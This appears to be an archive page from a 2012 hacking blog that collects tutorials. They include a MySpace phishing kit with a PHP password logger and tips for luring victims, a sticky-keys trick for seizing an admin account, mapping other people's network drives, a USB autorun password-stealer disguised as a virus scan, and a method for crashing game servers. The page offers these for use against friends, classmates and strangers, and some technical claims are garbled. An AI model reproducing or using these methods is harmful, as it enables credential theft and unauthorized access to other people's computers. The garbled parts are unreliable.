hacks: October 2012

Thursday, 11 October 2012

How to make Mozilla Firefox 30 times faster

1. Type "about:config" into the address bar and hit return. Scroll
down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.

Name it "nglayout.initialpaint.delay" and set its value to "0".

This value is the amount of time the browser waits before it acts on information it
recieves.

If you're using a broadband connection you'll load pages 2-30 times faster now.

How to make a phisher for a website

1. Intro
There are couple of other phishing tutorials around here, but some people seem to
have problems understanding them. So I'll try to be as simple as possible, and if you
have problems understanding it, then you need to get some beginner level computer
knowledge first.
-This article was written for educational purpose only. I'm not responsible for any
illegal activity that you may commit.
2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the
username and the password to a file, or does whatever you want.
3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to spam.com and sign up for a free account. In this tutorial we
will make a phishing site for Myspace(the procedure is equivalent for most of the
sites). While not signed in myspace, open anyone's profile and click on his picture.
That will lead you to Myspace's login page that has the red box with"You Must Be
Logged-In to do That!" just above your login form. Now, click File>Save Page As, and
save the myspace page to your Desktop. Open your saved page with any text
editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source
code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the
same function as if it were on the original site. The link to your phish site will be
'www.xxx.t35.com/index.php' - where 'xxx' is the name of your account.
But there is a little problem. When someone enters his username and password and
press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging
them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in
button, search button, etc.). We need to find the 'action=some link' that refers to
the Login button.
After some searching, we find the:
<h5 class="heading">
            Member Login
        </h5>
        <form action="http://secure.myspace.com/index.cfm?
fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYW
NrS2V5X18WAgUwY3RsMDAkT
WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGw
wMCRNYWluJFNwbGFzaERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24="
/>
</div>
and we know that 'action="http://secure.myspace.com/index.cfm?
fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.
Formerly, when you click the login button it would take the values in the username and
password boxes, and execute the functions in the
'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in
password boxes, and execute the functions in the 'login.php' file on your site(which
doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code
in it:
<?php
header ('Location: http://myspace.com ');
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of login.php is simple. It opens a file named 'passes.txt'(and creates it
if it doesn't already exist) and enter the informations there(the username and
password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.t35.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.t35.com/passes.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and
passes.txt. but the .php and .txt must stay the same.
4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
Most common way is to make an email similar to the admin, and sending them some
report with a link to log in the site(your phish site). Ofcourse you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing
this:
[url=YourPhishSiteLink]TheOriginalSiteLink[/url]
For example, www.google.com looks like a google, but it leads you to yahoo when you
click it.
If you're making the phisher for myspace, and want to get random ppl to it, you can
simply make some hot chick account and put some hot pic that will lead to your phish
site when clicked. So when they click the lusty image, they will be led to your phish
site telling them they need to log in to see that.
Like this:
[url=YourPhishSiteLink][img]link of the image[/img][/url]
When sending emails see for the option 'hyperlink', and it's self explainable once you
see it.
There are many other ways, and as I said, your creativity is the limit.
5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a
phisher, and how it works. Although is written for Myspace, the procedure is
equivalent for almost every other login site(for hotmail is different). After this, it's
up to you to explore, experiment and dive in the world of social engineering.

-: Folder Lock Without Any Software :-

Folder Lock With Password Without Any Software-

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.

Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.

Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock

the folder namely 'Locker'.

If you want to unlock your files,double click the batch file again and you would be prompted for
password.

Enter the password and enjoy access to the folder.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
goto UNLOCK

if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"

if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
echo Folder locked
goto End

:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL

echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

How to kick someone of a wireless network

Step 1: Open cmd.

Step 2: Write shutdown -i

Step 3: Choose a Victim from the list

Step 4: Choose to shutdown their computer

Step 5: Make the warning pop up 1 sec before shutting down.

Step 6: Click Ok.

Done! :)

How To Kick Everyone From A Counter Strike Source Server

INSTRUCTIONS:

1. Place Buffer1.cfg and Buffer2.cfg in your cfg folder. If it doesn't exist, make it
(see below)

(Commonly C:\User\program files\steam\steamapps\Account name\counter-strike
source\cstrike\cfg)
er

2. Go in game, open the developer's console, and type in the following (you may change
bind key):

Bind M "wait;exec Buffer1;exec Buffer2"

(If developer's console doesn't open, go to options, keyboard, advanced, enable
developer's console)

3. Go in game and rapidly hit the M key to crash the server. Depending on how fast
you hit it, it should

take anywhere from 15-30 seconds to crash. Don't stop hitting the key until you get a
message:

"Client # has overflowed reliable channel."

Link to Buffers: http://www.megaupload.com/?d=2RTOUUBU

Or check: G:\X-file\Stuff\Buffer Overflow.rar

How to hide files in a jpg

Set up:

1. Must have a .zip or .rar compressor.

2. Willingness to learn.
Steps:

1. Save the picture of choice to your desktop.

2. Make a new .rar or .zip folder on your desktop.

3. Add the files you want to hide into the .zip or .rar

4. Click start menu, run, cmd.

5. In Command Prompt type cd "desktop" with the quotation marks.

6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg

( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)

7. Now there should be the outputed file name with a .jpg extension on the desktop.

( Do not close Command Prompt just yet )

8. Double click it to open the picture and check it out.

9. When your done looking, and want to view the hidden files

Type: ren outputfilename.jpg outputfilename.rar or zip

Now you're done!

A quick info-fact:

With this technique of hiding files in a jpg you can send this to anyone and they just

have to rename the file extension to .zip or .rar.

With this technique the Al-Qaeda operatives were able to send info to others

secretively.

Tuesday, 9 October 2012

How to grab IP address with PHP

Today I’ll be showing you how to grab somebodies IP address when they visit a page.
The variable to use is $_SERVER['REMOTE_ADDR'] - It’s that simple. You can use it
for just about anything, here are a few examples.

Printing the Users IP Address:

<?php
print ($_SERVER['REMOTE_ADDR'], "I'm Watching You!");
?>

Printing it to a File:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen('ipaddresses.txt', 'a+);
fwrite($handle, $ip); fwrite($handle, "\n");
fclose($handle);
?>

All you have to do, is to make a text file and insert any of these codes or one of your
own and save it as anythingyouwant.php

Then upload it to your website and it'll do the trick :P

The Possibilities for what you can use this to are endless.

Good luck :D

How To Hack An Administrator Account With A Guest Account

(The only way this is going to work is if your account has permission to mody files in folder
«system32»)

Ever wanted to hack your college pc with guest account/student account so that you
can download with full speed Hack Administrator !!!!there ? or just wanted to hack
your friend’s pc to make him gawk when you tell your success story of hacking ?
well,there is a great way of hacking an administrator account from a guest account by
which you can reset the administrator password and getting all the privilages an
administrator enjoys on windows.. Interested ? read on…

Concept

Press shift key 5 times and the sticky key dialog shows up.This works even at the
logon screen. But If we replace the sethc.exe which is responsible for the sticky key
dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon
screen,we will get a command prompt with administrator privilages because no user
has logged on. From there we can hack the administrator password,even from a guest
account.

Prerequisites
Guest account with write access to system 32.

Here is how to do that -
* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe

* Copy the new sethc.exe to system 32,when windows asks for overwriting the
file,then click yes.

When asked to overwrite, overwrite the sethc.exe.

* Now Log out from your guest account and at the user select window,press shift key
5 times.

* Instead of Sticky Key confirmation dialog,command prompt with full administrator
privileges will open.

Press shift key 5 times and command prompt will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password
you like and press enter.

* You will see “ The Command completed successfully” and then exit the command
prompt and login into administrator with your new password.

* Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER
Ephemeral /ADD” where “Ephemeral” is the username you would like to add with
administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new DWORD value, write its name as the “user name” that u created
for your admin account and live with your admin account forever :)

How To Hack Into A Computer On LAN

NetBIOS Hacking

-What is it?-

NetBIOS Hacking is the art of hacking into someone else’s computer through your
computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for
a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-

Most people don’t even know, but when they’re on a LAN or WAN they could possibly
have their entire hard drive shared and not even know. So if we can find a way into
the network, their computer is at our disposal.

-What do I need?-

Windows OS

Cain and Abel (oxid.it - Home)
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
-[Step 1, Finding the target.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
So first off we need to find a computer or the computer to hack into. So if your
plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and
Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses
in the local subnet. Once you have opened up the program click on the sniffer tab,
click the Start/Stop sniffer, and then click the blue cross
Another window will pop up, make sure “All host in my subnet” is selected, and then
click ok.

It should begin to scan.

Then IP’s, computer names, and mac addresses will show up.

Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
Now, we don’t know if we have our designated target, or if we have a computer or
printer, or whatever else is on the LAN or WAN.

If you did get the IP of the target though, I still recommend reading through this
section, for it could be helpful later on.

Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.

From here we will do most of the hacking.

Now I will be referring to certain commands that need to be inputted into the
command prompt.

I will put these commands in quotes, but do not put the quotes in the code when you
type it into the prompt.

I am only doing this to avoid confusion.
Let’s get back to the hacking.

Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”

This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private
information):

IF it didn’t work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
Now, input this command “nbtstat –a (IP address of target).” An example would be
“nbtstat –a 192.168.1.103.”

This will show us if there is file sharing enabled, and if there is, it will give us the:
currently logged on user, workgroup, and computer name.

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually
very important, without this, the hack would not work. So, let me break it down from
the top to bottom. I will just give the first line of information, and then explain the
paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this
information tells us about our connection through the LAN, and in my case, I am not
connected through LAN, so the host is not found, and there is no IP.
The information right below the “Local Area Connection,” is “Wireless Network
Connection 2:” It gives us information about the connection to the target through
WAN. In my case I am connected through the WAN, so it was able to find the Node
IpAddress. The Node IpAddress is the local area IP of the computer you are going to
break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer,
tells us if it is shared, and gives us the computer name. Sometimes it will even give us
the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the
computer I am trying to connect to. If you look to the right you should see a <20>.
This means that file sharing is enabled on BATGIRL. If there was not a <20> to the
right of the Name, then you have reached a dead end and need to go find another IP,
or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you
are confused about which one is the workgroup, and the computer, look under the
Type category to the right of the < > for every Name. If it says UNIQUE, it is one
system, such as a printer or computer. If it is GROUP, then it is the workgroup
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++
++++++++++++++++++ ++++++++
Finally it’s time.

By now we know: that our target is online, our target has file sharing, and our target’s
computer name.

So it’s time to break in.

We will now locate the shared drives, folders, files, or printers. Type in “net view \\
(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”
We have our just found our share name. In this case, under the share name is “C,”
meaning that the only shared thing on the computer is C. Then to the right, under
Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C
DISK can sometimes be an entire person’s hard drive.

All's that is left to do is “map” the shared drive onto our computer. This means that
we will make a drive on our computer, and all the contents of the targets computer
can be accessed through our created network drive. Type in “net use K: \\(IP
Address of Target)\(Shared Drive). For my example in this tutorial, “net use
K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different
person, do u see the “K after “net use?” This is the letter of the drive that you are
making on your computer. It can be any letter you wish, as long as the same letter is
not in use by your computer. So it could be “net use G...,” for a different target.
As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.

If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.

Now open up “my computer” under the start menu, and your newly created network
drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this
drive, hence the name Network Drive.

The drive will not be deleted after you disconnect though, but you won’t be able to
access it until you reconnect to the network.

So if you are doing this for the content of the drive, I recommend dragging the files
and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
Congratulations! You’re DONE!

-Commands used in this tutorial:
PING

NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)

-Program used in this tutorial:
Cain and Abel

How to hack passwords using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc.

Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer.

We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.

------------------------------------------------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.

2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.

How to hack someone with his IP address

Introduction

1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document
will teach you some simple things about NETBIOS, what it does, how to use it, how to
hack with it, and some other simple DOS commands that will be useful to you in the
future.

1. Hardware and Firmware
1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control program of the PC.
It is responsible for starting up your computer, transferring control of the system to
your operating system, and for handling other low-level functions, such as disk access.
NOTE that the BIOS is not a software program, insofar as it is not purged from
memory when you turn off the computer. It's
firmware, which is basically software on a chip.

A convenient little feature that most BIOS manufacturers include is a startup
password. This prevents access to the system until you enter the correct password.
If you can get access to the system after the password has been entered, then there
are numerous software-based BIOS password extractors available from your local
H/P/A/V site.

NETBIOS/NBTSTAT - What does it do?

2. NETBIOS, also known as NBTSTAT is a program run on the Windows system and is
used for identifying a remote network or computer for file sharing enabled. We can
expoit systems using this method. It may be old but on home pc's sometimes it still
works great. You can use it on your friend at home or something. I don't care what
you do, but remember, that you are reading this document because you want to learn.
So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there
are two ways, but one's faster.

Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT

Method 2:Start>Run>Type Command>Type NBTSTAT

(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)

Ok! Now since you're in the DOS command under NBTSTAT, you're probably
wondering what all that crap is that's on your screen. These are the commands you
may use.

Your screen should look like the following:
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer
NETBIOS names.

-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts
Refresh
RemoteName Remote host machine name.

IP address Dotted decimal representation of the IP address.

interval Redisplays selected statistics, pausing interval seconds between each display.
Press Ctrl+C to stop redisplaying
statistics.
C:\WINDOWS\DESKTOP>

The only two commands that are going to be used and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Host Names

3. Now, the -a means that you will type in the HOST NAME of the person's computer
that you are trying to access. Just in case you don't have any idea what a Host Name
looks like here's an example.
123-fgh-ppp.internet.com

there are many variations of these adresses. For each different address you see
there is a new ISP assigned to that computer. look at the difference.

abc-123.internet.com
ghj-789.newnet.com

these are differnet host names as you can see, and, by identifying the last couple
words you will be able to tell that these are two computers on two different ISPs.
Now, here are two host names on the same ISP but a different located server.
123-fgh-ppp.internet.com
567-cde-ppp.internet.com
IP Addresses

4. You can resolce these host names if you want to the IP address (Internet Protocol)
IP addresses range in different numbers. An IP looks like this:
201.123.101.123

Most times you can tell if a computer is running on a cable connection because of the
IP address's numbers. On faster connections, usually the first two numbers are low.
here's a cable connection IP.
24.18.18.10

on dialup connections IP's are higher, like this:
208.148.255.255

notice the 208 is higher than the 24 which is the cable connection.

REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.

Some companies make IP addresses like this to fool the hacker into believing it's a
dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This
gives you an idea on IP addresses which you will be using on the nbtstat command.
Getting The IP Through DC (Direct Connection)

5. First. You're going to need to find his IP or host name. Either will work. If you are
on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname
without parenthesis. you will either get a host name or an IP. copy it down. If you do
not get it or you are not using mIRC then you must direct connect to their computer
or you may use a sniffer to figure out his IP or host name. It's actually better to do
it without the sniffer because most sniffers do not work now-a-days. So you want to
establish a direct connection to their computer. OK, what is a direct connection?

When you are:
Sending a file to their computer you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ when sending a file or a chat request acception allows a direct connection.
Any time you are sending a file. You are directly connected. (Assuming you know the
user is not using a proxy server.)

Voice Chatting on Yahoo establishes a direct connection.

If you have none of these programs, either i suggest you get one, get a sniffer, or
read this next statement.

If you have any way of sending thema link to your site that enables site traffic
statistics, and you can log in, send a link to your site, then check the stats and get
the IP of the last visitor. It's a simple and easy method i use. It even fool some
smarter hackers, because it catches them off guard. Anyway, once you are directly
connected use either of the two methods i showed you earlier and get into DOS. Type
NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It
will show you all computers connected to yours. (This is also helpful if you think you
are being hacked by a trojan horse and is on a port that you know such as Sub Seven:
27374.)

Your screen should look like this showing the connections to your computer:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
The first line indicated the Protocol (language) that is being used by the two
computers.

TCP (Transfer Control Protocol) is being used in this and is most widely used.
Local address shows your IP address, or the IP address of the system you on.
Foreign address shows the address of the computer connected to yours.

State tells you what kind of connection is being made ESTABLISHED - means it will
stay connected to you as long as you are on the program or as long as the computer is
allowing or is needing the other computers connection to it. CLOSE_WAIT means the
connection closes at times and waits until it is needed or you resume connection to be
made again. One that isn't on the list is TIME_WAIT which means it is timed. Most
Ads that run on AOL are using TIME_WAIT states.

the way you know the person is directly connected to your computer is because of
this:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------

Notice the host name is included in the fourth line instead of the IP address on all.
This is almost ALWAYS, the other computer that is connected to you. So here, now,
you have the host name:

abc-123-ppp.webnet.com

If the host name is not listed and the IP is then it NO PROBLEM because either one
works exactly the same. I am using abc-123-ppp.webnet.com host name as an example.
Ok so now you have the IP and/or host name of the remote system you want to
connect to. Time to hack!

Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's
the crap again. Well, now time to try out what you have leanred from this document
by testing it on the IP and/or host name of the remote system. Here's the only thing
you'll need to know.

IMPORTANT, READ NOW!!!

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.

Remember this?
Time to use it.
-a will be the host name
-A will be the IP

How do i know this?

Read the Statements following the -a -A commands. It tells you there what each
command takes.

So have you found which one you have to use?
GOOD!
Time to start.
Using it to your advantage

6. Type this if you have the host name only.

NBTSTAT -a (In here put in hostname without parenthesis)

Type this is you have the IP address only.

NBTSTAT -A (In here put in IP address without parenthesis)

Now, hit enter and wait. Now Either one of two things came up

1. Host not found

2. Something that looks like this:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
---------------------------------------------
If the computer responded "Host not found" Then either one of two things are the
case:

1. You screwed up the host name.

2. The host is not hackable.

If number one is the case you're in great luck. If two, This system isn't hackable
using the NBTSTAT command. So try another system.

If you got the table as above to come up, look at it carefully as i describe to you each
part and its purpose.

Name - states the share name of that certain part of the computer
<00>, <03>, <20>, <1E> - Are the Hexidecimal codes giving you the services available on
that share name.

Type - Is self-explanatory. It's either turned on, or activated by you, or always on.
Status - Simply states that the share name is working and is activated.

Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it?

GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that
file sharing is enabled on the share name that is on that line with the hex number. So
that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's
How to do it. (This is the hard part)
LMHOST File

7. There is a file in all Windows systems called LMHOST.sam. We need to simply add
the IP into the LMHOST file because LMHOST basically acts as a network,
automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in
LMHOST and hit enter. when it comes up open it using a text program such as
wordpad, but make sure you do not leave the checkmark to "always open files with
this extension" on that. Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmans
erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.

Read this over and over until you understand the way you want your connection to be
set. Here's an example of how to add an IP the way I would do it:
#PRE #DOM:255.102.255.102 #INCLUDE

Pre will preload the connection as soon as you log on to the net. DOM is the domain or
IP address of the host you are connecting to. INCLUDE will automaticall set you to
that file path. In this case as soon as I log on to the net I will get access to
255.102.255.102 on the C:/ drive. The only problem with this is that by doin the
NETSTAT command while you are connected, and get the IP of your machine. That's
why it only works on simple PC machines. Because people in these days are computer
illiterate and have no idea of what these commands can do. They have no idea what
